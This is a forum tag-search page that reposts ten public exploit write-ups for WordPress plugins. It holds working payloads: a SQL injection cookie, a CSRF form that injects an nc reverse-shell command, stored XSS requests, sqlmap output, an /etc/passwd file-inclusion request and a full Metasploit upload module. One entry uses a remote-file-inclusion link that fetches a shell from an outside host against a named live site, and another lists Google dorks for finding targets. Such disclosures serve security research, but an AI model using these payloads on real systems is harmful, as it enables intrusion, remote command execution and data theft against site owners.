Search the forums

Showing results for the tag 'plugin'.



19 results found

  1. # Exploit Title: Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection
     # Date: 2018-09-09
     # Exploit Author: Ceylan Bozogullarindan
     # Vendor Homepage: http://modalsurvey.pantherius.com/
     # Software Link: https://downloads.wordpress.org/plugin/wp-survey-and-poll.zip
     # Version: 1.5.7.3
     # Tested on: Windows 10
     # CVE: N\A

     # Description
     # The vulnerability allows an attacker to inject sql commands using the value of a cookie parameter.

     # PoC
     # Step 1. When you visit a page which has a poll or survey, a question will appear for answering.
     # Answer that question.
     # Step 2. When you answer the question, wp_sap will be assigned a value. Open a cookie manager,
     # and change it with the payload shown below;

     ["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]

     # It is important that the "OR" statement must be 1=2, because the application is reflecting the first result
     # of the query. When you make it 1=1, you should see a question from the first record.
     # Therefore the OR statement must return False.
     # Step 3. Reload the page. Open the source code of the page. Search "sss_params".
     # You will see the version of the DB in the value of the sss_params parameter.

     # The Request

     Host: localhost
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-GB,en;q=0.5
     Accept-Encoding: gzip, deflate
     Cookie: wp_sap=["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]
     Connection: keep-alive
     Upgrade-Insecure-Requests: 1
     Cache-Control: max-age=0

     # The result from the source code of the page

     <script type='text/javascript'>
     /* <![CDATA[ */
     var sss_params = {"survey_options":"{\"options\":\"[\\\"center\\\",\\\"easeInOutBack\\\",\\\"\\\",\\\"-webkit-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-moz-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-ms-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-o-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);\\\",\\\"rgb(0, 0, 0)\\\",\\\"rgb(93, 93, 93)\\\",\\\"1\\\",\\\"5\\\",\\\"12\\\",\\\"10\\\",\\\"12\\\",500,\\\"Thank you for your feedback!\\\",\\\"0\\\",\\\"0\\\",\\\"0\\\"]\",\"plugin_url\":\"http:\\\/\\\/www.*****.com\\\/wp-content\\\/plugins\\\/wp-survey-and-poll\",\"admin_url\":\"http:\\\/\\\/www.******.com\\\/wp-admin\\\/admin-ajax.php\",\"survey_id\":\"1101225978\",\"style\":\"modal\",\"expired\":\"false\",\"debug\":\"true\",\"questions\":[[\"Are You A First Time Home Buyer?\",\"Yes\",\"No\"],[\>>>>>>"10.1.36-MariaDB-1~trusty\"<<<<<<<]]}"};
     /* ]]> */
     </script>

     DB version: "10.1.36-MariaDB-1~trusty"....
  2. <!--
     About:
     ===========
     Component: Plainview Activity Monitor (Wordpress plugin)
     Vulnerable version: 20161228 and possibly prior
     Fixed version: 20180826
     CVE-ID: CVE-2018-15877
     CWE-ID: CWE-78
     Author:
     - Lydéric Lefebvre (https://www.linkedin.com/in/lydericlefebvre)

     Timeline:
     ===========
     - 2018/08/25: Vulnerability found
     - 2018/08/25: CVE-ID request
     - 2018/08/26: Reported to developer
     - 2018/08/26: Fixed version
     - 2018/08/26: Advisory published on GitHub
     - 2018/08/26: Advisory sent to bugtraq mailing list

     Description:
     ===========
     Plainview Activity Monitor Wordpress plugin is vulnerable to OS command injection which allows an attacker to remotely execute commands on the underlying system.
     The application passes unsafe user supplied data to the ip parameter in activities_overview.php.
     Privileges are required in order to exploit this vulnerability, but this plugin version is also vulnerable to CSRF attack and Reflected XSS.
     Combined, these three vulnerabilities can lead to Remote Command Execution just with an admin click on a malicious link.

     References:
     ===========
     https://github.com/aas-n/CVE/blob/master/CVE-2018-15877/

     PoC:
     -->

     <html>
     <!--
     Wordpress Plainview Activity Monitor RCE
     [+] Version: 20161228 and possibly prior
     [+] Description: Combine OS Commanding and CSRF to get reverse shell
     [+] Author: Lydéric LEFEBVRE
     [+] CVE-ID: CVE-2018-15877
     [+] Usage: Replace 127.0.0.1 & 9999 with your ip and port to get reverse shell
     [+] Note: Many reflected XSS exist on this plugin and can be combined with this exploit as well
     -->
     <body>
     <script>history.pushState('', '', '/')</script>
     <form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
     <input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" />
     <input type="hidden" name="lookup" value="Lookup" />
     <input type="submit" value="Submit request" />
     </form>
     </body>
     </html>
  3. # Exploit Title: WordPress Plugin Jibu Pro 1.7 - Cross-Site Scripting
     # Google Dork: inurl:"/wp-content/plugins/jibu-pro"
     # Date: 2018-08-29
     # Exploit Author: Renos Nikolaou
     # Software Link: https://downloads.wordpress.org/plugin/jibu-pro.1.7.zip
     # Version: 1.7
     # Tested on: Kali Linux
     # CVE: N/A

     # Description: Jibu Pro is prone to Stored Cross Site Scripting vulnerabilities
     # because it fails to properly sanitize user-supplied input.

     # PoC - Stored XSS - Parameter: name
     # 1) Login as a user who has access to the Jibu Pro plugin.
     # 2) Jibu-Pro --> Create Quiz.
     # 3) At the Quiz Name type: poc"><script>alert(1)</script> , then fill the remaining fields and click Save.
     #    (The first pop-up will appear. Also keep note of the shortcode, similar to: [Test Number])
     # 4) Click Create New Questions, fill the fields and click Save.
     # 5) Copy the Shortcode [Test Number] into any post or page and visit it via browser.

     # Post Request (Step 3):

     POST /wordpress/wp-content/plugins/jibu-pro/quiz_action.php HTTP/1.1
     Host: domain.com
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Referer: http://domain.com/wordpress/wp-admin/edit.php?page=jibu-pro%2Fquiz_form.php&action=new
     Cookie: wordpress_295cdc576d46a74a4105db5d33654g45
     Connection: close
     Upgrade-Insecure-Requests: 1
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 512

     name=poc"><script>alert(1)</script>&description=poc&passedMark=3&no_of_ques=3&content=Congrats&_wpnonce=c2414882de&_wp_http_referer=/wordpress/wp-admin/edit.php?page=jibu-pro/quiz_form.php&action=new&action=new&quiz=&user_ID=1&submit=Save
  4. # Exploit Title: WordPress Plugin Quizlord 2.0 - Cross-Site Scripting
     # Date: 2018-08-29
     # Exploit Author: Renos Nikolaou
     # Software Link: https://downloads.wordpress.org/plugin/quizlord.zip
     # Version: 2.0
     # Tested on: Kali Linux
     # CVE: N/A

     # Description : Quizlord is prone to Stored Cross Site Scripting vulnerabilities
     # because it fails to properly sanitize user-supplied input.

     # PoC - Stored XSS - Parameter: title
     # 1) Login as a user who has access to the Jibu Pro plugin.
     # 2) Quizlord --> Add a Quiz.
     # 3) At the title type: poc"><script>alert(1)</script> , then fill the remaining fields and click Save.
     #    (The first pop-up will appear. Also keep note of the shortcode: [quizlord id="#"])
     # 4) Copy the Shortcode [quizlord id="#"] into any post or page and visit it via browser.

     # Post Request (Step 3):

     POST /wordpress/wp-admin/admin.php HTTP/1.1
     Host: domain.com
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Referer: http://domain.com/wordpress/wp-admin/admin.php?page=quizlord
     Cookie: wordpress_295cdc576d46a74a4105db5d33654g45
     Connection: close
     Upgrade-Insecure-Requests: 1
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 188

     action=ql_insert&title=poc"><script>alert(1)</script>&description=&time=0&numbtype=numerical&numbmark=&rightcolor=00FF00&wrongcolor=FF0000&showtype=paginated&addquiz=Save
  5. Title: Blind SQL injection and multiple reflected XSS vulnerabilities in Wordpress Plugin Arigato Autoresponder and Newsletter v2.5
     Author: Larry W. Cashdollar, @_larry0
     Date: 2018-08-22
     CVE-IDs: [CVE-2018-1002000] [CVE-2018-1002001] [CVE-2018-1002002] [CVE-2018-1002003] [CVE-2018-1002004] [CVE-2018-1002005] [CVE-2018-1002006] [CVE-2018-1002007] [CVE-2018-1002008] [CVE-2018-1002009]
     Download Site: https://wordpress.org/plugins/bft-autoresponder/
     Vendor: Kiboko Labs https://calendarscripts.info/
     Vendor Notified: 2018-08-22, Fixed v2.5.1.5
     Vendor Contact: @prasunsen wordpress.org
     Advisory: http://www.vapidlabs.com/advisory.php?v=203

     Description:
     This plugin allows scheduling of automated autoresponder messages and newsletters, and managing a mailing list. You can add/edit/delete and import/export members. There is also a registration form which can be placed in any website or blog. You can schedule an unlimited number of email messages. Messages can be sent on a defined number of days after user registration, or on a fixed date.

     Vulnerability:
     These vulnerabilities require administrative privileges to exploit.

     CVE-2018-1002000
     There is an exploitable blind SQL injection vulnerability via the del_ids variable by POST request.
     In line 69 of file controllers/list.php:

     65 $wpdb->query("DELETE FROM ".BFT_USERS." WHERE id IN (".$_POST['del_ids'].")");

     del_ids is not sanitized properly.

     Nine Reflected XSS.

     CVE-2018-1002001
     In line 22-23 of controllers/list.php:

     22 $url = "admin.php?page=bft_list&offset=".$_GET['offset']."&ob=".$_GET['ob'];
     23 echo "<meta http-equiv='refresh' content='0;url=$url' />";

     CVE-2018-1002002
     bft_list.html.php:28:
     <div><label><?php _e('Filter by email', 'broadfast')?>:</label> <input type="text" name="filter_email" value="<?php echo @$_GET['filter_email']?>"></div>

     CVE-2018-1002003
     bft_list.html.php:29:
     <div><label><?php _e('Filter by name', 'broadfast')?>:</label> <input type="text" name="filter_name" value="<?php echo @$_GET['filter_name']?>"></div>

     CVE-2018-1002004
     bft_list.html.php:42:
     <input type="text" class="bftDatePicker" name="sdate" id="bftSignupDate" value="<?php echo empty($_GET['sdate']) ? '' : $_GET['sdate']?>">

     CVE-2018-1002005
     bft_list.html.php:43:
     <input type="hidden" name="filter_signup_date" value="<?php echo empty($_GET['filter_signup_date']) ? '' : $_GET['filter_signup_date']?>" id="alt_bftSignupDate"></div>

     CVE-2018-1002006
     integration-contact-form.html.php:14:
     <p><label><?php _e('CSS classes (optional):', 'broadfast')?></label> <input type="text" name="classes" value="<?php echo @$_POST['classes']?>"></p>

     CVE-2018-1002007
     integration-contact-form.html.php:15:
     <p><label><?php _e('HTML ID (optional):', 'broadfast')?></label> <input type="text" name="html_id" value="<?php echo @$_POST['html_id']?>"></p>

     CVE-2018-1002008
     list-user.html.php:4:
     <p><a href="admin.php?page=bft_list&ob=<?php echo $_GET['ob']?>&offset=<?php echo $_GET['offset']?>"><?php _e('Back to all subscribers', 'broadfast');?></a></p>

     CVE-2018-1002009
     unsubscribe.html.php:3:
     <p><input type="text" name="email" value="<?php echo @$_GET['email']?>"></p>

     Exploit Code:

     SQL Injection CVE-2018-1002000

     $ sqlmap --load-cookies=./cook -r post_data --level 2 --dbms=mysql

     Where post_data is:

     POST /wp-admin/admin.php?page=bft_list&ob=email&offset=0 HTTP/1.1
     Host: example.com
     Connection: keep-alive
     Content-Length: 150
     Cache-Control: max-age=0
     Origin: http://example.com
     Upgrade-Insecure-Requests: 1
     Content-Type: application/x-www-form-urlencoded
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
     Referer: http://example.com/wp-admin/admin.php?page=bft_list&ob=email&offset=0
     Accept-Encoding: gzip, deflate
     Accept-Language: en-US,en;q=0.9
     Cookie: wordpress_XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

     mass_delete=1&del_ids=*&_wpnonce=aa7aa407db&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dbft_list%26ob%3Demail%26offset%3D0[!http]

     (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
     sqlmap identified the following injection point(s) with a total of 300 HTTP(s) requests:
     ---
     Parameter: #1* ((custom) POST)
         Type: AND/OR time-based blind
         Title: MySQL >= 5.0.12 time-based blind - Parameter replace
         Payload: mass_delete=1&del_ids=(CASE WHEN (6612=6612) THEN SLEEP(5) ELSE 6612 END)&_wpnonce=aa7aa407db&_wp_http_referer=/wp-admin/admin.php?page=bft_list%26ob=email%26offset=0[!http]
     ---
     [11:50:08] [INFO] the back-end DBMS is MySQL
     web server operating system: Linux Debian 8.0 (jessie)
     web application technology: Apache 2.4.10
     back-end DBMS: MySQL >= 5.0.12
     [11:50:08] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.47'

     [*] shutting down at 11:50:08

     CVE-2018-1002001
     http://example.com/wp-admin/admin.php?page=bft_list&action=edit&id=12&ob=XSS&offset=XSS
  6. # Exploit Title: WordPress Plugin Localize My Post 1.0 - Local File Inclusion
     # Author: Manuel Garcia Cardenas
     # Date: 2018-09-19
     # Software link: https://es.wordpress.org/plugins/localize-my-post/
     # CVE: 2018-16299

     # DESCRIPTION
     # This bug was found in the file: /localize-my-post/ajax/include.php
     # include($_REQUEST['file']);
     # The parameter "file" is not sanitized, allowing inclusion of local files.
     # To exploit the vulnerability it is only necessary to use version 1.0 of the HTTP protocol to interact with the application.

     # Local File Inclusion POC:

     GET /wordpress/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
  7. ##
     # This module requires Metasploit: https://metasploit.com/download
     # Current source: https://github.com/rapid7/metasploit-framework
     ##

     class MetasploitModule < Msf::Exploit::Remote
       Rank = ExcellentRanking

       include Msf::Exploit::Remote::HTTP::Wordpress
       include Msf::Exploit::PhpEXE

       def initialize(info={})
         super(update_info(info,
           'Name'            => "WordPress Responsive Thumbnail Slider Arbitrary File Upload",
           'Description'     => %q{
             This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin v1.0 for WordPress post authentication.
           },
           'License'         => MSF_LICENSE,
           'Author'          =>
             [
               'Arash Khazaei',  # EDB PoC
               'Shelby Pace'     # Metasploit Module
             ],
           'References'      =>
             [
               [ 'EDB', '37998' ]
             ],
           'Platform'        => 'php',
           'Arch'            => ARCH_PHP,
           'Targets'         =>
             [
               [ 'Responsive Thumbnail Slider Plugin v1.0', { } ]
             ],
           'Privileged'      => false,
           'DisclosureDate'  => "Aug 28 2015",
           'DefaultTarget'   => 0))

         register_options(
           [
             OptString.new('TARGETURI', [ true, "Base path for WordPress", '/' ]),
             OptString.new('WPUSERNAME', [ true, "WordPress Username to authenticate with", 'admin' ]),
             OptString.new('WPPASSWORD', [ true, "WordPress Password to authenticate with", '' ])
           ])
       end

       def check
         # The version regex found in extract_and_check_version does not work for this plugin's
         # readme.txt, so we build a custom one.
         check_code = check_version || check_plugin_path
         if check_code
           return check_code
         else
           return CheckCode::Safe
         end
       end

       def check_version
         plugin_uri = normalize_uri(target_uri.path, '/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt')
         res = send_request_cgi(
           'method'  =>  'GET',
           'uri'     =>  plugin_uri
         )
         if res && res.body && res.body =~ /Version:([\d\.]+)/
           version = Gem::Version.new($1)
           if version <= Gem::Version.new('1.0')
             vprint_status("Plugin version found: #{version}")
             return CheckCode::Appears
           end
         end
         nil
       end

       def check_plugin_path
         plugin_uri = normalize_uri(target_uri.path, '/wp-content/uploads/wp-responsive-images-thumbnail-slider/')
         res = send_request_cgi(
           'method'  =>  'GET',
           'uri'     =>  plugin_uri
         )
         if res && res.code == 200
           vprint_status('Upload folder for wp-responsive-images-thumbnail-slider detected')
           return CheckCode::Detected
         end
         nil
       end

       def login
         auth_cookies = wordpress_login(datastore['WPUSERNAME'], datastore['WPPASSWORD'])
         return fail_with(Failure::NoAccess, "Unable to log into WordPress") unless auth_cookies
         store_valid_credential(user: datastore['WPUSERNAME'], private: datastore['WPPASSWORD'], proof: auth_cookies)
         print_good("Logged into WordPress with #{datastore['WPUSERNAME']}:#{datastore['WPPASSWORD']}")
         auth_cookies
       end

       def upload_payload(cookies)
         manage_uri = 'wp-admin/admin.php?page=responsive_thumbnail_slider_image_management'
         file_payload = get_write_exec_payload(:unlink_self => true)
         file_name = "#{rand_text_alpha(5)}.php"

         # attempt to access plugins page
         plugin_res = send_request_cgi(
           'method'  =>  'GET',
           'uri'     =>  normalize_uri(target_uri.path, manage_uri),
           'cookie'  =>  cookies
         )
         unless plugin_res && plugin_res.body.include?("tmpl-uploader-window")
           fail_with(Failure::NoAccess, "Unable to reach Responsive Thumbnail Slider Plugin Page")
         end

         data = Rex::MIME::Message.new
         data.add_part(file_payload, 'image/jpeg', nil, "form-data; name=\"image_name\"; filename=\"#{file_name}\"")
         data.add_part(file_name.split('.')[0], nil, nil, "form-data; name=\"imagetitle\"")
         data.add_part('Save Changes', nil, nil, "form-data; name=\"btnsave\"")
         post_data = data.to_s

         # upload the file
         upload_res = send_request_cgi(
           'method'  =>  'POST',
           'uri'     =>  normalize_uri(target_uri.path, manage_uri, '&action=addedit'),
           'cookie'  =>  cookies,
           'ctype'   =>  "multipart/form-data; boundary=#{data.bound}",
           'data'    =>  post_data
         )
         page = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, manage_uri), 'cookie' => cookies)
         fail_with(Failure::Unknown, "Unsure of successful upload") unless (upload_res && page && page.body =~ /New\s+image\s+added\s+successfully/)

         retrieve_file(page, cookies)
       end

       def retrieve_file(res, cookies)
         fname = res.body.scan(/slider\/(.*\.php)/).flatten[0]
         # nil must be tested before empty?, otherwise a missing match raises NoMethodError
         fail_with(Failure::BadConfig, "Couldn't find file name") if fname.nil? || fname.empty?
         file_uri = normalize_uri(target_uri.path, "wp-content/uploads/wp-responsive-images-thumbnail-slider/#{fname}")
         print_good("Successful upload")
         send_request_cgi(
           'uri'     =>  file_uri,
           'method'  =>  'GET',
           'cookie'  =>  cookies
         )
       end

       def exploit
         unless check == CheckCode::Safe
           auth_cookies = login
           upload_payload(auth_cookies)
         end
       end
     end
  8. # Exploit Title: Wordpress Plugin Support Board 1.2.3 - Cross-Site Scripting
     # Date: 2018-10-16
     # Exploit Author: Ismail Tasdelen
     # Vendor Homepage: https://schiocco.com/
     # Software Link : https://board.support/
     # Software : Support Board - Chat And Help Desk
     # Version : v1.2.3
     # Vulnerability Type : Code Injection
     # Vulnerability : HTML Injection and Stored XSS
     # CVE : N/A

     # In the Schiocco "Support Board - Chat And Help Desk" plugin 1.2.3 for WordPress,
     # a Stored XSS vulnerability has been discovered in file upload areas in the
     # Chat and Help Desk sections via the msg parameter
     # in a /wp-admin/admin-ajax.php sb_ajax_add_message action.

     # HTTP POST Request : [Stored XSS]

     POST /wp-admin/admin-ajax.php HTTP/1.1
     Host: TARGET
     User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
     Accept: */*
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Referer: https://TARGET/chat/
     Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     X-Requested-With: XMLHttpRequest
     Content-Length: 450
     Cookie: _ga=GA1.2.1452102121.1539634100; _gid=GA1.2.1034601494.1539634100; PHPSESSID=pljbkl7n96fpl5uicnbec21f77
     Connection: close

     action=sb_ajax_add_message&msg=&files=https%3A%2F%2FTARGET%2Fwp-content%2Fuploads%2Fsupportboard%2F70765091%2F%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E.jpg%7C%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E.jpg&time=10%2F15%2F2018%2C+4%3A23%3A42+PM&user_id=70765091&user_img=https%3A%2F%2Fboard.support%2Fwp-content%2Fuploads%2F2017%2F07%2Fuser.jpg&user_name=James+Wilson&user_type=user&environment=wp&sb_lang=

     # In the v1.2.3 version of the Support Board - Chat And Help Desk PHP & Wordpress Plugin,
     # the Stored XSS vulnerability has been discovered in the HTML Injection vulnerability and
     # file upload areas in the Chat and Help Desk sections of Schiocco.

     # HTTP POST Request : [HTML Injection]

     POST /wp-admin/admin-ajax.php HTTP/1.1
     Host: TARGET
     User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
     Accept: */*
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Referer: https://TARGET/desk-demo/
     Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     X-Requested-With: XMLHttpRequest
     Content-Length: 288
     Cookie: _ga=GA1.2.1452102121.1539634100; _gid=GA1.2.1034601494.1539634100; PHPSESSID=pljbkl7n96fpl5uicnbec21f77
     Connection: close

     action=sb_ajax_add_message&msg=%26%238220%3B%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E&files=&time=10%2F15%2F2018%2C+4%3A19%3A45+PM&user_id=70765091&user_img=https%3A%2F%2Fboard.support%2Fwp-content%2Fuploads%2F2017%2F07%2Fuser.jpg&user_name=James+Wilson&user_type=user&environment=wp&sb_lang=
  9. # Exploit Title: WordPress aio-shortcodes Plugin - Remote Code Execution
     # Google Dork: Index of /wp-content/plugins/aio-shortcodes
     # Exploit: timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php
     # Date: 26 October 2018
     # Author: L4663r666h05t
     # Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php
     # Version: 1.x.x
     # Screenshot: http://prntscr.com/lahts7
     # Tested on: Windows 10 Pro (x64)

     Versions Affected: 1.x.x

     Live Site:
     http://www.qvgop.org/wp-content/plugins/aio-shortcodes/timthumb.php
     http://www.qvgop.org/wp-content/plugins/aio-shortcodes/timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php

     Your Shell:
     http://localhost/wp-content/plugins/aio-shortcodes/cache/md5.php
     http://localhost/wp-content/plugins/aio-shortcodes/cache/shell.php
  10. #################################################################################################
      # Exploit Title : WordPress Simple-Press Simple-Forum Editors and TinyMCE Plugin Full Path Disclosure Vulnerability
      # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
      # Date : 20/06/2018
      # Vendor Homepages : simple-press.com/downloads/tinymce-editor-plugin/ - simplepressforum.com - northworks.ca - moxiecode.com
      #   + dsquaredmedia.co.uk - templatic.com - auvergne-rhone-alpes.developpement-durable.gouv.fr
      #   + cyberchimps.com/responsive-theme/ - wordpress.com/theme/mimbopro - uusiaalto.com - amesdesign.net
      # Tested On : Windows and Linux
      # Versions : WordPress 2.6 - 2.8 - 3.x - 4.2.2
      # Category : WebApps
      # Exploit Risk : Medium
      # CWE : CWE-200 [ Information Exposure ]
      #   An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information.
      #   + CWE-399 [ Resource Management Errors ]
      #   + CWE-211 [ Information Exposure Through Externally-Generated Error Message ]
      #   + CWE-532 [ Information Exposure Through Log Files ]
      #   + CWE-538 [ File and Directory Information Exposure ]
      #   + CWE-199 [ Information Management Errors ]
      #################################################################################################

      # Description :
      Every forum needs a decent editor, and with TinyMCE you get just that. Provide your users with the same editor as you find in the WordPress admin panel to allow for an all round more familiar and user friendly posting experience. This editor can utilise two toolbars and also TinyMCE plugins, of which it comes pre supplied with all editing essentials such as 'bold', 'blockquote', 'spoiler', 'link', 'image' and more. Settings allow you all the control you should need including the essential option of rejecting posts with embedded formatting.

      # Screenshot 1 => simple-press.com/wp-content/uploads/edd/2015/04/tinymce-editor-1.png
      # Screenshot 2 => simple-press.com/wp-content/uploads/edd/2015/04/tinymce-editor-2.png

      # According to the Owasp Security Portal, Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file, e.g.: /home/omg/htdocs/file/. Certain vulnerabilities, such as using the load_file() (within a SQL Injection) query to view the page source, require the attacker to have the full path to the file they wish to view.

      # Risk Factor :
      The risks regarding FPD may produce various outcomes. For example, if the webroot is getting leaked, attackers may abuse the knowledge and use it in combination with file inclusion vulnerabilities to steal configuration files regarding the web application or the rest of the operating system.

      For Example :

      Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/includes/functions.php on line 2

      In combination with, say, unprotected use of the PHP function file_get_contents, the attacker gets an opportunity to steal configuration files.

      The sourcecode of index.php:

      <?php
      echo file_get_contents(getcwd().$_GET['page']);
      ?>

      An attacker crafts a URL like so, with the knowledge of the FPD in combination with Relative Path Traversal:

      http://site.com/index.php?page=../../../../../../../home/example/public_html/includes/config.php

      <?php
      //Hidden configuration file containing database credentials.
      $hostname = 'localhost';
      $username = 'root';
      $password = 'owasp_fpd';
      $database = 'example_site';
      $connector = mysql_connect($hostname, $username, $password);
      mysql_select_db($database, $connector);
      ?>

      Disregarding the above sample, FPD can also be used to reveal the underlying operating system by observing the file paths. Windows for instance always starts with a drive letter, e.g. C:\, while Unix based operating systems tend to start with a single forward slash.

      *NIX:
      Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/alice/public_html/includes/functions.php on line 2

      Microsoft Windows:
      Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in C:\Users\bob\public_html\includes\functions.php on line 2

      The FPD may reveal a lot more than people normally might suspect. The two examples above reveal usernames on the operating systems as well; "alice" and "bob". Usernames are of course important pieces of credentials. Attackers can use those in many different ways, ranging from bruteforcing over various protocols (SSH, Telnet, RDP, FTP...) to launching exploits requiring working usernames.

      You can check here to fully understand the attack : owasp.org/index.php/Full_Path_Disclosure

      #################################################################################################

      # Google Dorks :
      inurl:''/wp-content/plugins/simple-forum/editors/tinymce/''
      intext:''proudly designed by dsquaredmedia.co.uk''
      intext:''Website by NorthWorks''
      intext:''Powered By WordPress | Voyage Theme''
      intext:''Powered by WordPress & Mimbo Pro''
      intext:''Web Site By dsixty''
      intext:''© Mainostoimisto Underground Graphics 2012''
      intext:''Grace Theme by Templatic"
      intext:''développé avec WordPress pour la DREAL Auvergne''
      intext:''Site designed by amesDesign''
      intext:''Responsive Theme powered by WordPress''

      #################################################################################################

      Full Path Disclosure Vulnerabilities =>

      # Exploit : /wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
      Error : {"result":null,"id":null,"error":{"errstr":"Could not get raw post data.","errfile":"","errline":null,"errcontext":"","level":"FATAL"}}

      # Exploit : /wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php
      Error : Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_Logger has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php on line 21

      # Exploit : /wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/JSON.php
      Error : Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_JSONReader has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/JSON.php on line 26
      Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_JSON has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/JSON.php on line 362

      # Exploit : /wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/config.php
      Error : Warning: Use of undefined constant PSPELL_FAST - assumed 'PSPELL_FAST' (this will throw an Error in a future version of PHP) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/config.php on line 9
      Warning: Use of undefined constant PSPELL_FAST - assumed 'PSPELL_FAST' (this will throw an Error in a future version of PHP) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/config.php on line 15

      # Exploit : /wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/SpellChecker.php
      Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; SpellChecker has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/SpellChecker.php on line 9

      # Exploit : /wp-content/plugins/simple-forum/admin/panel-admins/sfa-admins.php
      Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-admins/sfa-admins.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-admins/sfa-admins.php on line 11

      # Exploit : /wp-content/plugins/simple-forum/admin/panel-config/sfa-config.php
      Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-config/sfa-config.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-config/sfa-config.php on line 11

      # Exploit : /wp-content/plugins/simple-forum/admin/panel-forums/sfa-forums.php
